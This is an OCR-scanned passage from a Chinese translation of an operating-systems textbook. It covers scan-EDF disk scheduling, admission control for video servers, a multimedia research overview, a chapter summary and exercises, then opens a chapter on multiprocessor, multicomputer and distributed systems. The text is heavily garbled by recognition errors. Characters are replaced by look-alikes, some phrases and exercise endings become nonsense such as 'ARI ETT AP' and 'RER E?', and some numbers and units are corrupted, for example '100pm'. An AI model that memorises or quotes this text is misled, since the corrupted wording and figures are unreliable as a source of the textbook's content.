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求 错 过 其 最 终 时 限 。 从 实时 的 观点 来 看 ， 将 请 求 按照 最 终 时 限 排序 并 
且 以 最 终 时 限 的 顺序 对 它们 进行 处 理 ， 可 以 将 错过 最 终 时 限 的 机 会 最 
小 化 ， 但 是 可 能 增加 总 寻 道 时 间 o 


使 用 scan-EDF 算 法 (scan-EDF algorithm) (Reddy#ilWyllie, 
1994) 可 以 将 这 两 个 因素 结合 起 来 。 这 一 算法 的 思想 是 ， 将 最 终 时 限 
比较 接近 的 请 求 收集 在 一 起 分 成 若干 批 ， 并 且 以 柱 面 的 顺序 对 其 进行 
处 理 。 作 为 一 个 例子 ， 我 们 考虑 图 7-27 当 t=700 时 的 情形 。 磁 盘 驱 动 器 
知道 它 有 11 个 挂 起 的 请 求 ， 这 些 请 求 具有 不 同 的 最 终 时 限 和 不 同 的 柱 
面 。 它 可 以 决定 将 具有 最 早 的 最 终 时 限 的 5 个 请 求 视 为 一 批 ， 将 它们 按 
照 柱 面 号 排序 ， 并 且 使 用 电梯 算法 以 柱 面 顺序 对 它们 进行 服务 。 于 
是 ,顺序 将 是 110、330、440、676 和 680。 只 要 每 个 请 求 能 够 在 其 最 终 
时 限 之 前 完成 ， 这 些 请 求 就 可 以 安全 地 重新 排列 ， 从 而 将 所 需 的 总 寻 
道 时 间 最 小 化 。 
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图 7-27 scan-EDF 算 法 使 用 最 终 时 限 和 柱 面 号 进行 调度 


如 琳 不 同 的 视频 流 具 有 不 同 的 数据 率 ， 那 么 当 一 个 新 的 客户 出 现 
时 将 引起 一 个 严重 的 问题 : 该 客户 是 否 应 该 被 接纳 ? 如 有 果 接 纳 该 客户 
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人 否 。 人 存在 两 种 方法 计算 是 否 接纳 新 的 客户 。 一 种 方法 是 假设 每 个 客户 
平均 地 需要 某 些 数量 的 资源 ， 如 磁 表 人 带宽、 内 存 缓冲 区 、CPU 时 间 
等 。 如 采 剩 下 的 每 一 货源 对 于 一 个 平均 的 顾客 来 说 都 是 足够 的 ， 则 接 
纳 新 的 客户 。 


另 一 种 算法 更 为 复杂 。 它 要 关注 新 顾客 想 要 看 的 特定 的 电影 ， 碍 
找 该 电影 的 (预先 计算 的 ) 数据 率 ， 而 对 于 黑白 片 和 彩色 片 、 卡 通 片 
和 故事 族 、 爱 情 片 和 战争 片 ， 数 据 率 都 不 相同 。 爱 情 片 运动 缓慢 ， 具 
有 较 长 的 场景 和 绥 慢 的 痰 入 淡出 ， 所 有 这 些 部 会 充分 得 到 压缩 ， 而 战 
和 争 片 具 有 许多 快速 的 切换 和 迅速 的 运动 ， 因 此 具有 许多 巾 和 较 大 的 P 
帧 。 如 有 果 服 务 器 对 于 痢 客 户 想 要 看 的 电影 而 言 具有 足够 的 容量 ， 那 么 
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710 ”有 天 多 媒体 的 研究 


多 媒体 是 近 些 年 的 热门 课题 ， 所 以 有 相当 多 数量 关于 多 媒体 的 人 研 
究 。 这 些 研究 中 有 许多 是 关于 内 容 、 构 造 工 具 和 应 用 的 ， 而 这 些 都 超 
出 了 本 书 的 范围 。 另 一 个 热门 领域 是 多 媒体 与 网 络 ， 这 也 超出 了 本 书 
范围 。 但 是 关于 多 媒体 服务 器 的 研究 ， 尤 其 是 分 布 式 服务 器 与 操作 系 
统 是 相关 的 (Sarhan 和 Das,2004; Matthur 和 Mundur,2004; Zaia 等 人 ， 
2004) ; 文 持 多 媒体 的 文件 系统 也 是 与 操作 系统 相关 的 研究 (Ahn 等 
人 ，2004; Cheng 等 人 ，2005; Kang 等 人 ，2006; Park 和 Ohnm， 


2006) 。 


优秀 的 音频 和 视频 编码 (尤其 是 3D 应 用 ) 对 于 高 性 能 是 很 关键 
的 。 因 此 ， 这 些 课题 也 引起 了 相当 程度 的 关注 (Chattopadhyay 等 人 ， 
2006; Hari 等 人 ，2006; Kum 和 Mayer-Patel,2006) 。 


服务 质量 对 多 媒体 系统 非常 重要 ， 所 以 吸引 了 相当 的 关注 
(Childs 和 Ingram，2001; Tamai 等 人 ，2004) 。 与 服务 质量 有 关 的 还 
有 调度 ， 以 及 CPU (Etsion 等 人 ，2004;，Etsion 等 人 ，2006; Nieh 和 


Lam, 2003; Yuan 和 Nahrstedt，2006) 和 硬盘 (Lund 和 Goebel， 


2003; Reddy 等 人 ，2005) 


在 为 付费 客户 提供 多 媒体 广播 编排 服务 时 ， 安 全 就 变 得 很 重要 
了 ， 所 以 这 个 课题 也 受到 了 关注 Barni，2006 。 
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多 媒体 是 一 种 非常 有 前 途 的 计算 机 应 用 。 由 于 多 媒体 文件 的 巨大 
和 苛刻 的 实时 回放 要 求 ， 为 文本 而 设计 的 操作 系统 对 于 多 媒体 而 言 不 
征 最 理想 的 。 多 媒体 文件 包含 多 重 平 行 的 轨迹 ， 通 常 有 一 个 视频 轨迹 
和 至 少 一 个 音频 轨迹 ， 有 时 还 有 一 些 字 幕 执 迹 。 在 回放 期 间 ， 这 些 轨 
迹 都 必须 保持 同步 。 


音频 通过 周期 性 地 对 音量 进行 采样 而 得 以 记录 下 来 ， 通 稍 每 秒 采 
样 44 100 次 (针对 CD 质量 的 声音 ) 。 压 缩 可 以 应 用 于 音频 信号 ， 得 到 
大 约 10 倍 的 均匀 的 压缩 率 。 视 频 压 缩 可 以 使 用 帧 内 压缩 (JPEG) ， 也 
可 以 使 用 帧 间 压 缩 (MPEG) 。 后 者 将 P 帧 表示 为 与 前 一 帧 的 差 ， 而 B 
帧 则 既 可 以 基于 前 面 的 帧 ， 也 可 以 基于 后 面 的 帧 。 


多 媒体 需要 实时 调度 以 便 满 足 其 最 终 时 限 。 通 常 使 用 的 算法 有 两 
个 。 第 一 个 算法 是 速率 单调 调度 ， 它 是 一 个 静态 抢先 算法 ， 它 根据 进 
程 的 周期 将 固定 的 优先 级 分 配给 进程 。 第 二 个 算法 是 最 早 最 终 时 限 优 
先 调度 ， 它 是 一 个 动态 算法 ， 总 是 选择 具有 最 近 最 终 时 限 的 进程 。 
EDF 更 复杂 一 些 ,， 但 是 它 可 以 达到 100% 的 利用 率 ， 而 RMS 有 了 时 不 能 达 
FIJ o 
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求 。 这 一 方法 从 根本 上 不 同 于 常规 的 操作 系统 ， 但 是 为 了 满足 实时 要 
求 这 样 做 是 必要 的 。 


文件 可 以 连续 存放 也 可 以 不 连续 存放 。 在 后 一 种 情况 下 ， 存 储 单 
位 可 以 是 可 变 长 度 的 〈 一 个 磁盘 块 是 一 帧 ) ， 也 可 以 是 固定 长 度 的 
(一 个 磁盘 块 是 多 个 帧 ) 。 这 些 方法 具有 不 同 的 权衡 。 


们 盘 上 文件 的 存放 格局 影响 着 系统 的 性 能 。 当 存在 多 个 文件 时 ， 
有 时 使 用 风琴 管 算 法 。 横 跨 多 个 磁盘 将 文件 分 成 条 带 〈 无 论 是 宽 条 市 
LERRET) 也 是 常用 的 。 为 了 改进 性 能 ， 人 磁盘 块 与 文件 高 速 绥 存 集 
略 也 得 到 了 广泛 的 利用 。 


习题 
1. 未 压缩 的 黑白 NTSC 电 视 能 否 通过 快速 以 太 网 发 送 ? 如 果 可 以 的 
话 ， 同 时 可 以 发 送 多 少 个 频道 ? 
2.HDTV 的 水 平分 辨 率 是 常规 电视 的 两 倍 (1280 像 素 对 640 像 
素 ) 。 利 用 正文 中 提供 的 信息 ， 它 需要 的 带宽 比 标准 电视 多 多 少 ? 
3. 在 图 7-3 中 ， 对 于 快 进 和 快 倒 存 在 着 单独 的 文件 。 如 果 一 台 视 频 


服务 器 还 打算 支持 慢 动 作 ， 那 么 对 于 前 进 方 同 的 慢 动作 是 否 需 要 男 一 
个 文件 ? 后 倒 的 方向 如 何 ? 


4. 声 音信 号 用 16 位 有 符号 数 (1 个 符号 位 ，15 个 数值 位 ) 采样 。 以 
百分比 表示 的 最 大 量化 噪声 是 多 少 ?” 对 于 长 盘 协 雪 曲 或 播 滚 音乐 这 是 
不 是 一 个 大 问题 ， 或 者 对 于 两 者 是 不 是 问题 相同 ?请 解释 你 的 答案 。 


5. 唱 片 公司 能 够 使 用 20 位 采样 制作 数字 唱片 的 母 片 ， 最 终 发 行 给 
听众 的 唱片 使 用 的 是 16 位 采样 。 请 提出 一 种 方法 来 减少 量化 噪声 的 影 
啊 ， 并 讨论 你 的 方案 的 优点 和 缺 操 。 


6.DCT 变 换 使 用 8x8 的 块 ， 但 是 用 于 运动 补偿 的 算法 使 用 16x16 的 
块 。 这 一 差异 是 否 会 导致 问题 ? 如 果 是 的 话 ， 在 MPEG 中 这 个 问题 是 


怎样 解决 的 ? 


7. 在 图 7-10 中 ， 我 们 看 到 对 于 静止 的 背景 和 运动 角色 MPEG 是 如 何 
工作 的 。 假 设 一 个 MPEG 视 频 是 由 这 样 的 场景 制作 的 : 在 该 场景 中 摄 
像 机 被 安 闻 在 一 个 三 脚 杂 上 并 且 从 左 到 右 播 动 镜头 ， 播 动 的 速度 使 得 
没有 两 幅 连 续 的 帆 是 相同 的 。 现 在 是 不 是 所 有 的 帧 都 必须 是 项 ? 为 什 


Zn 


8. 假 设 图 7-13 中 的 三 个 进程 中 的 每 个 进程 都 伴随 一 个 进程 ， 该 进 
程 文 持 一 个 音频 流 按照 与 视频 进程 相同 的 周期 播放 ， 那 么 音频 缓冲 区 
可 以 在 视频 帧 之 间 得 到 更 新 。 所 有 这 三 个 音频 进程 都 是 完全 相同 的 。 
对 于 一 个 音频 进程 的 每 一 次 突 发 ， 有 多 少 可 用 的 CPU 时 间 ? 


9. 两 个 实时 进程 在 一 台 计 算 机 上 运行 ， 第 一 个 进程 每 25ms 运 行 
10ms， 第 二 个 进程 每 40ms 运 行 15ms。RMS 对 于 它们 是 否 总 是 起 作 
用 ? 


10. 一 台 视 频 服 务 器 的 CPU 利用 率 是 65%。 采 用 RMS 调 度 该 服务 器 
可 以 放映 多 少 部 电影 ? 


11. 在 图 7-15 中 ，EDF 算 法 保持 CPU 100% 忙 碌 直 到 tc150 的 时 刻 ， 
它 不 能 保持 CPU 无 限期 地 忙碌 ， 因 为 CPU 每 秒 只 有 975ms 的 工作 要 
做 。 扩 展 该 图 到 150ms 之 后 并 确定 采用 EDF 算 法 CPU 何 时 首次 变 为 空 
[A] ° 


12.DVD 可 以 保存 足够 的 数据 用 于 全 长 的 电影 并 且 传 输 率 足够 显示 
电视 质量 的 节目 。 为 什么 视频 服务 器 不 采用 许多 DVD 驱 动 硕 的 “储存 
库 ” 作 为 数据 源 ? 


13. 近 似 视频 点 播 系统 的 操作 员 发 现 某 个 城市 的 人 们 不 愿意 为 电影 
开始 而 等 待 超过 6 分 钟 的 时 间 。 对 于 一 部 3 小 时 的 电影 ， 需 要 多 少 个 并 
行 的 数据 流 ? 


14. 考 虑 一 个 采用 Abram-Profeta 与 Shin 提 出 的 方法 的 系统 ， 在 这 个 
系统 中 视频 服务 器 操作 员 而 望 客户 能 够 完全 在 本 地 加 前 或 加 后 搜索 1 分 
钟 。 假 设 视 频 流 是 速率 为 4 Mbps 的 MPEG-2， 每 个 客户 在 本 地 必须 有 
多 大 的 缓冲 区 空间 ? 


15. 考 虑 Abam-Profeta 和 和 Shin 方法。 如果 用 户 用 大 小 为 50MB 的 


RAM 用 来 缓冲 ， 那 么 一 个 2Mbps 的 视频 流 的 AT 是 多 少 ? 


16. 一 个 HDTV 视频 点 播 系统 使 用 图 7-20a 的 小 块 模 型 ， 和 磁盘 块 大 小 
为 IKB。 如 果 视 频 分 辨 率 为 1280x720 并 且 数 据 流 速率 为 12 Mbps， 那 么 
在 一 部 采用 NTSC 制 式 的 2 小 时 长 的 电影 中 有 多 少 人 磁盘 空间 浪费 在 内 部 
RER E? 


17. 针 对 NTSC 和 PAL 思 考 图 7-20a 的 存储 分 配方 法 。 对 于 给 定 的 磁 
熏 块 和 影片 大 小 ， 是 否 一 种 制式 比 另 一 种 制式 具有 更 多 的 内 部 碎片 ? 
如 果 是 的 话 ， 哪 一 种 制式 要 好 一 些 ? 为 什么 ? 


18. 考 虑 图 7-20 所 示 的 两 种 选择 。 回 HDTV 的 转换 是 人 否 更 有 利于 其 
中 的 一 种 系统 ? 请 讨论 。 


19. 考 虑 一 个 系统 ， 它 有 2KB 倒 盘 块 ， 能 存储 2 小 时 的 PAL 制 电影 ， 
平均 每 帧 16KB。 那 么 用 小 磁 司 块 存储 方法 平均 浪费 空间 是 多 少 ? 


20. 上 例 中 ， 如 采 每 帧 项 需要 8 字 方 ， 其 中 有 1 字 广 用 来 指示 每 帧 的 
人 磁盘 块 号 ， 那 么 可 能 存储 的 最 长 的 电影 大 小 是 多 少 ? 


21. 当 每 一 个 帧 集合 的 大 小 相同 时 ，Chen 与 Thapar 的 近似 视频 点 播 
方法 工作 得 最 为 出 色 。 假 设 一 部 电影 正在 用 同时 发 出 的 24 个 数据 流 播 
放 ， 并 且 10 帧 中 有 1 帧 是 幢 。 再 假设 帧 的 大 小 是 P 帧 的 10 倍 ，B 帧 的 大 
小 与 P 帧 相同 。 一 个 等 于 4 个 1 巾 和 20 个 P 帧 的 缓冲 区 不 够 大 的 概率 是 多 
D? 你 认为 这 样 的 一 个 缓冲 区 大 小 是 可 接受 的 吗 ? 为 了 使 问题 易于 处 
H, 假设 在 数据 流 中 帧 的 类 型 是 随机 且 独 立 分 布 的 。 


22. 对 于 Chen 和 Thapar 方 法 ， 假 设 有 5 个 轨道 需要 8I- 帧 ，35 个 轨道 
需要 5I- 帧 ，45 个 轨道 需要 3I- 帧 ，15 个 帧 从 1 到 2? 帧 中 选择 ， 如 果 我 们 想 
保证 95 帧 能 被 缓冲 絮 容 纳 ， 那 么 缓冲 絮 的 大 小 应 该 是 多 少 ? 


23. 对 于 Chen 和 Thapar 方 法 ， 假 定 有 一 个 用 PAL 制 格式 编码 的 3 小 时 
电影 ， 需 要 在 每 个 15 分 钟 内 流出 。 那 么 需要 多 少 个 并 发 流 ? 


24. 图 7-18 的 最 终结 果 是 播放 点 不 再 处 于 绥 促 区 的 中 间 。 设 计 一 个 
方案 ， 最 少 在 播放 点 之 后 有 5 分 钟 并 且 在 播放 点 之 前 有 5 分 钟 。 你 可 以 
做 出 任何 合理 的 假设 ， 但 是 陈述 要 清楚 。 


25. 图 7-19 的 设计 要 求 所 有 语言 轨迹 在 每 一 巾 上 读 出 。 假 设 视 频 服 
务 器 的 设计 痢 必 须 支 持 大 量 的 语言 ， 但 是 不 想 将 这 么 多 的 RAM 投 入 给 
缓冲 区 以 保存 每 一 帧 。 其 他 可 利用 的 选择 是 什么 ? 每 一 种 选择 的 优点 
ARI ETT AP 
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流行 的 电影 ， 直 到 最 不 流行 的 电影 ，Zipf 定 律 预 测 的 概率 是 多 少 ? 


27. 一 块 具 有 1000 个 柱 面 的 14GB 的 磁盘 用 于 保存 以 4 Mbps 速 率 流 
动 的 1000 个 30 秒 的 MPEG-2 视 频 剪 辑 。 这 些 视 频 剪 辑 根据 管 风 和 于 算法 
存放 。 依 照 Zipf 定 律 ， 磁 一 臂 花 在 中 间 10 个 柱 面 的 时 间 比 例 是 多 少 ? 


28. 假 设 对 于 影片 A、B 、C 和 D 的 相对 需求 由 Zipf 定 律 所 描述 ， 对 
于 如 图 7-24 中 所 示 的 四 种 划分 条 带 的 方法 ， 四 块 磁 盘 的 期 望 相对 利用 


率 是 多 少 ? 


29. 两 个 视频 点 播客 户 相 隔 6 秒 钟 开始 观看 同一 部 PAL 电 影 。 如 采 
系统 加 快 一 个 数据 流 并 且 减 慢 另 一 个 数据 流 以 便 使 它们 合并 ， 为 了 在 3 
分 钟 内 将 它们 合并 ， 需 要 的 加 速 /减速 百分比 是 多 少 ? 


30. 一 台 MPEG-2 视 频 服 务 器 对 于 NTSC 视 频 使 用 图 7-26 的 回环 方 
法 。 所 有 的 视频 流出 自 一 个 转速 为 10 800 rpm 的 UltraWide SCSI 人 磁盘 ， 
磁盘 的 平均 寻 道 时 间 是 3ms。 能 够 得 到 支持 的 数据 流 有 多 少 ? 


31. 重 做 前 一 个 习题 ， 但 是 现在 假设 scan-EDF 算 法 将 平均 寻 道 时 间 
减少 了 20%。 现 在 能 够 得 到 支持 的 数据 流 有 多 少 ? 


32. 考 虑 到 下 面 一 系列 对 磁盘 的 需求 ， 每 个 需求 由 一 个 元 组 (截止 
时 间 (ms) ， 柱 面 ) 代表 。 使 用 scan_EDF 算 法 后 ， 四 个 即将 到 期 的 需 
求 聚集 在 一 起 得 到 服务 。 如 果 服 务 每 个 请 求 的 平均 时 间 是 6ms， 那 么 
有 没有 错过 的 终止 时 间 ? (32 300); (36500); (40 210); (34 310) 假 定 


当前 时 间 是 15ms 。 


33. 再 次 重 做 前 一 个 习题 ， 但 是 现在 假设 每 一 帆 在 四 块 磁盘 上 分 成 
条 市 ， 在 每 块 磁 青 上 scan-EDF 算 法 将 平均 寻 道 时 间 诚 少 了 20%。 现 在 
能 够 得 到 文 持 的 数据 流 有 多 少 ? 


34. 正 文摘 述 了 使 用 五 个 数据 请 求 为 一 批 来 调度 在 图 7-27a 中 所 描述 
的 情形 。 如 果 所 有 请 求 需要 等 量 的 时 间 ， 在 这 个 例子 中 每 个 请 求 可 以 
允许 的 最 大 时 间 是 多 少 ? 


35. 供 生成 计算 机 “墙纸 ”的 许多 位 图 图 像 使 用 很 少 的 颜色 并 且 十 分 
容易 压缩 。 一 种 简单 的 压缩 方法 是 : 选择 一 个 不 在 输入 文件 中 出 现 的 
数据 值 ， 并 且 将 其 用 作 一 个 标志 。 一 个 字 节 一 个 字 节 地 读 取 文件 ， 寻 
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件 。 当 4 个 或 更 多 字 节 的 重复 串 被 发 现时 ， 将 一 个 由 3 个 字 节 组 成 的 串 
写 到 输出 文件 ， 这 3 个 字 节 的 种 包 括 标 志 字 世 、 指 示 从 4 到 255 计 数 的 字 
玉 和 在 输入 文件 中 发 现 的 实际 的 值 。 使 用 该 算法 编写 一 个 压缩 程序 ， 

以 及 一 个 能 够 恢复 原始 文件 的 解压 缩 程 序 。 额 外 要 求 : 如 何 处 理 在 数 
据 中 包含 标志 字 市 的 文件 ? 


36. 计 算 机 动画 是 通过 显示 具有 微小 差异 的 图 像 序 列 实现 的 。 编 写 
一 个 程序 ， 计 算 两 幅 具 有 相同 尺寸 的 未 压缩 位 图 图 像 之 间 的 字 市 和 子 
节 的 靶 。 当 然 ， 输 出 文件 应 该 与 输入 文件 具有 相同 的 大 小 。 使 用 这 一 
差 值 文件 作为 前 一 个 习题 中 的 压缩 程序 的 输入 ， 并 且 将 这 一 方法 的 效 
率 和 压缩 单个 图 像 的 情况 进行 比较 。 


37. 实 现 教 材 中 的 基本 RMS 和 和 EDF 算法。 程序 的 主要 输入 是 一 个 有 
若干 行 的 文件 ， 每 行 代表 一 个 进程 的 CPU 请 求 ， 并 且 有 如 下 的 参数 : 
周期 〈 秒 ) 、 计 算 时 间 〈 秒 ) 、 开 始 时 间 〈 秒 ) 、 结 束 时 间 ( 秒 ) 。 
在 以 下 方面 对 比 两 个 算法 : a) 由 于 CPU 的 不 可 调度 性 导致 平均 被 阻塞 
的 CPU 请 求 数 ，b) 平 均 CPU 使 用 率 ; c) 每 个 CPU 请 求 的 平均 等 待 时 间 ; 
d) 错 过 截止 时 间 的 请 求 平均 数量 。 


38. 实 现存 储 多 媒体 文件 的 常量 时 间 长 度 和 常量 数据 长 度 的 技术 。 
程序 的 主要 输入 是 一 系列 文件 ， 每 个 文件 包含 一 个 MPEG-2 压 缩 多 媒 
体 文件 〈 如 电影 ) 的 每 帧 元 数据 。 元 数据 包括 帧 类 型 (VP/B) 、 帧 


长 、 相 关联 的 音频 帧 等 。 对 于 不 同文 件 块 大 小 ， 束 需要 的 总 存储 空间 
大 小 、 当 费 的 磁盘 存储 空间 和 平均 RAM 需 求 三 个 方面 比较 两 种 技术 。 


39. 在 上 面 的 程序 上 深 加 一 个 “读者 ”程序 ， 它 随机 地 从 上 面 的 输入 
列表 中 选择 文件 ， 使 用 VCR 功 能 的 视频 点播 或 准 视频 点 播 。 实 现 scan- 
EDF 算 法 以 便 能 够 给 出 磁盘 读 请 求 。 谍 每 个 文件 的 平均 寻找 磁 副 次 数 
比较 音量 时 间 长 度 和 第 量 数 据 长 度 这 两 个 方法 。 


第 8 章 ”多 处 理 机 系统 


从 计算 机 诞生 之 日 起 ， 人 们 对 更 强 计 算 能 力 的 无 休止 的 追求 惑 一 
直 驱 使 着 计算 机 工业 的 发 展 。ENIAC 可 以 完成 每 秒 300 次 的 运算 ， 它 一 
下 子 就 比 以 往 任何 计算 器 都 快 1000 多 倍 ， 但 是 人 们 并 不 满足 。 我 们 现 
在 有 了 比 ENIAC 快 数 百 万 倍 的 机 器 ， 但 是 还 有 对 更 强大 机 器 的 需求 。 
天 文学 家 们 正在 了 解 宇宙 i， 生 物 学 家 正在 试图 理解 人 类 基因 的 含义 ， 
航空 工程 师 们 致力 于 建造 更 安全 和 速度 更 快 的 飞机 ， 而 所 有 这 一 切 都 
需要 更 多 的 CPU 周期 。 然 而 ， 即 使 有 更 多 运算 能 力 ， 仍 然 不 能 满足 需 
求 。 


过 去 的 解决 方案 是 使 时 钟 走 得 更 快 。 但 是 ， 现 在 开始 遇 到 对 时 钟 
速度 的 限制 了 。 按 照 爱 因 斯 坦 的 相对 论 ， 电 子 信号 的 速度 不 可 能 超过 
光速 ， 这 个 速度 在 真空 中 大 约 是 30cm/ns， 而 在 铜 线 或 光纤 中 约 是 
20cm/ns。 这 在 计算 机 中 意味 着 10GHz 的 时 钟 ， 信 号 的 传送 距离 总 共 不 
会 超过 2cm。 对 于 100GHz 的 计算 机 ， 整 个 传送 路 径 长 度 最 多 为 2mm 。 
而 在 一 台 1THz (1000GHz) 的 计算 机 中 ， 传 送 距 离 就 不 足 100pm 了 ， 
这 在 一 个 时 钟 周期 内 正好 让 信和 号 从 一 端 到 另 一 端 并 返回 。 


证 计算 机 变 得 如 此 之 小 是 可 能 的 ， 但 是 这 会 遇 到 另 一 个 基本 问 
题 : 散热 。 计 算 机 运行 得 越 快 ， 产 生 的 热量 就 越 多 ， 而 计算 机 越 小 就 
越 难 散 热 。 在 高 端 Pentium 系 统 中 ，CPU 的 散热 器 已 经 比 CPU 自 身 还 要 


大 了 。 总 而 言 之 ， 从 1MHz 到 1GHz 需 要 的 是 更 好 的 芯片 制造 工艺 ， 而 
从 1GHz 到 1THz 则 需要 完全 不 同 的 方法 。 


获得 更 高 速度 的 一 种 处 理 方式 是 大 规模 使 用 并 行 计算 机 。 这 些 机 
器 有 许多 CPU， 每 一 个 都 以 “通常 ”的 速度 〈 在 一 个 给 定年 份 中 的 速度 ) 
运行 ， 但 是 总 体 上 会 有 比 单个 CPU 强大 得 多 的 计算 能 力 。 具 有 1000 个 
CPU 的 系统 已 经 商业 化 了 。 在 未 来 十 年 中 ， 可 能 会 建造 出 具有 100 万 个 
CPU 的 系统 。 当 然 为 了 获得 更 高 的 速度 ， 还 有 其 他 潜在 的 处 理 方式 ， 
如 生物 计算 机 ， 但 在 本 章 中 ， 我 们 将 专注 于 有 多 个 普通 CPU 的 系统 。 


在 高 强度 的 数据 处 理 中 经 常 采 用 高 度 并 行 计算 机 。 如 天 气 预测 、 
围绕 机 可 的 气流 建 模 、 世 界 经 济 模拟 或 理解 大 脑 中 药物 - 受 体 的 相互 作 
等 问题 都 是 计算 密集 型 的 。 解 决 这 些 问题 需要 多 个 CPU 同时 长 时 间 
运行 。 在 本 章 中 讨论 的 多 处 理 机 系统 被 广泛 地 用 于 解决 这 些 问 题 以 及 
在 其 他 科学 、 工 程 领域 中 的 类 似 问 题 。 


男 一 个 相关 的 进展 是 因特网 不 可 思议 地 快速 增长 。 因 特 网 最 初 被 
设计 为 一 个 军用 的 容错 控制 系统 的 原型 ， 然 后 在 从 事 学 术 人 研究 的 计算 
机 科学 家 中 流行 开 来 ， 并 且 在 过 去 它 已 经 获得 了 许多 新 用 途 。 其 中 一 
种 用 还是 ， 把 全 世界 的 数 千 台 计算 机 连接 起 来 ， 共 同 处 理 大 型 的 科学 
问题 。 在 某 种 意义 上 ， 一 个 包含 有 分 布 在 全 世界 的 1000 台 计算 机 的 系 
统 与 在 一 个 房间 中 有 1000 台 计算 机 的 系统 之 间 没 有 差别 ， 尽 管 这 两 个 


系统 在 延 时 和 其 他 技术 特征 方面 会 有 所 不 同 。 在 本 章 中 我 们 也 将 讨论 


这 些 系 统 。 


假如 有 足够 多 的 资金 和 足够 大 的 房间 ， 把 一 百 万 台 无 天 的 计算 机 
放 到 一 个 房间 中 很 容易 做 到 。 把 一 百 万 台 无 天 的 计算 机 放 到 全 世界 整 
更 容易 了 ， 因 为 不 存在 第 二 个 问题 了 。 当 要 在 一 个 房间 中 使 这 些 计 算 
机 相互 通信 ， 以 便 共同 处 理 一 个 问题 时 ， 问 题 束 出 现 了 。 结 案 ， 和 人 们 
在 互 连 技术 方面 做 了 大 量 工作 ， 而 且 不 同 的 互 连 技 术 已 经 导致 了 不 同 
性 质 的 系统 以 及 不 同 的 软件 组 织 。 


在 电子 (或 光学 ) 部 件 之 间 的 所 有 通信 ， 归 根 结 底 是 在 它们 之 间 
发 送 消息 一 一 具有 良好 定义 的 位 串 (bit string) 。 其 差别 在 于 所 涉及 的 
时 间 范 围 、 距 离 范 围 和 逻辑 组 织 。 一 个 极端 的 例子 是 共享 存储 器 多 处 
理 机 ， 系 统 中 有 从 2 个 到 1000 个 的 CPU 通 过 一 个 共享 存储 器 通信 。 在 这 
个 模型 中 ， 每 个 CPU 可 同样 访问 整个 物理 存储 器 ， 可 使 用 指令 LOAD 和 
STORE 读 写 单个 的 字 。 访 问 一 个 存储 器 字 通 常 需 要 2 一 10ns。 尽 管 这 个 
模型 ， 如 图 8-1a 所 示 ， 看 来 很 简单 ， 但 是 实际 上 要 实现 它 并 不 那么 简 
单 ， 而 且 通 常 涉 及 底层 大 量 的 消息 传递 ， 这 一 点 我 们 会 简要 地 加 以 说 
明 。 不 过 ， 该 消息 传递 对 于 程序 员 来 说 是 不 可 见 的 。 


其 次 是 图 8-lb 中 的 系统 ， 许 多 CPU- 存 储 器 通过 某 种 高 速 互连网 络 
连接 在 一 起 。 这 种 系统 称 为 消息 传递 型 多 计算 机 。 每 个 存储 器 局 部 对 
应 一 个 CPU， 且 只 能 被 该 CPU 访问 。 这 些 CPU 通 过 互连网 络 发 送 多 字 消 
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征 这 仍然 比 匈 8-1a 中 系统 的 存储 融 访 问 时 间 长 。 在 这 种 设计 中 没有 全 局 
共享 的 存储 器 。 多 计算 机 (消息 传递 系统 ) 比 (共享 存储 器 ) 多 处 理 
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机 系统 容易 构建 ， 但 是 编程 比较 困难 。 可 见 ， 每 种 类 型 各 有 其 优点 。 


本 地 存储 器 、、 


图 8-1 a) 共 至 存储 器 多 处 理 机 ; b) 消 息 传 递 多 计算 机 ;，o 广 域 分 布 式 
系统 


第 三 种 模型 参见 图 8-1c， 所 有 的 计算 机 系统 都 通过 一 个 广域网 连接 
起 来 ， 如 因特网 ， 构 成 了 一 个 分 布 式 系统 (distributed system) 。 每 台 
计算 机 有 自己 的 存储 器 ， 当 然 ， 通 过 消息 传递 进行 系统 通信 。 图 8-1b 和 
图 8-1c 之 间 真 正 惟一 的 差别 是 ， 后 者 使 用 了 完整 的 计算 机 而 且 消 息 传递 
时 间 通 党 需要 10~100ms。 如 此 长 的 延迟 造成 使 用 这 类 松散 耦合 系统 的 
方式 和 网 8-1b 中 的 紧密 耦合 系统 不 同 。 三 种 类 型 的 系统 在 通信 延迟 上 各 
不 相同 ， 分 别 有 三 个 数量 级 的 差别 。 类 似 于 一 天 和 三 年 的 差别 。 


本 章 有 四 个 主要 部 分 ， 分 别 对 应 于 图 8-1 中 的 三 个 模型 再 加 上 虚拟 
化 技术 〈 一 种 通过 软件 创造 出 更 多 虚拟 CPU 的 方法 ) 。 在 每 一 部 分 
中 ， 我 们 先 简 要 地 介绍 相关 的 和 硬件。 然后， 讨论 软 件 ， 特 别 是 与 这 种 
系统 类 型 有 天 的 操作 系统 问题 。 我 们 会 发 现 ， 每 种 情况 都 面临 痢 不 同 
的 问题 并 且 需 要 不 同 的 解决 方法 。 


8.1 多 处 理 机 


共 至 存储 恬 多 处 理 机 (或 以 后 简称 为 多 人 处理 机 ，multiprocessor) 
征 这 样 一 种 计算 机 系统 ， 其 两 个 或 更 多 的 CPU 全 部 共享 访问 一 个 公用 
ARAM 。 运 行 在 任何 一 个 CPU 上 的 程序 都 看 到 一 个 普通 (通常 是 分 
页 ) 的 虚拟 地 址 空间 。 这 个 系统 惟一 特别 的 性 质 是 ，CPU 可 对 存储 天 
字 写 入 某 个 值 ， 然 后 读 回 该 字 ， 并 得 到 一 个 不 同 的 值 (因为 男 一 个 
CPU 改写 了 它 ) 。 在 进行 恰当 组 织 时 ， 这 种 性 质 构 成 了 人 处理 器 间 通 信 
的 基础 :一 个 CPU 同 存储 右 写 入 某 些 数 据 而 男 一 个 读 取 这 些 数 据 。 


至 于 最 重要 的 部 分 ， 多 人 处理 机 操作 系统 只 是 通 第 的 操作 系统 。 它 
们 处 理 系 统 调 用 ， 进 行 存储 器 管理 ， 提 供 文 件 系 统 并 管理 WO 设备 。 不 
过 ， 在 茶 些 领域 里 它们 还 是 有 一 些 独 特 的 性 质 。 这 包括 进程 同步 、 资 
源 管理 以 及 调度 。 下 面 首先 概要 地 介绍 多 处 理 机 的 硬件 ， 然 后 进入 有 
天 操作 系统 的 问题 。 
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8.1.1 多 处 理 机 硬件 


所 有 的 多 处 理 机 都 具有 每 个 CPU 可 访问 全 部 存储 器 的 性 质 ， 而 有 
些 多 处 理 机 仍 有 一 些 其 他 的 特性 ， 即 读 出 每 个 存储 器 字 的 速度 是 一 样 
快 的 。 这 些 机 器 称 为 UMA (Uniform Memory Access， 统 一 存储 器 访 
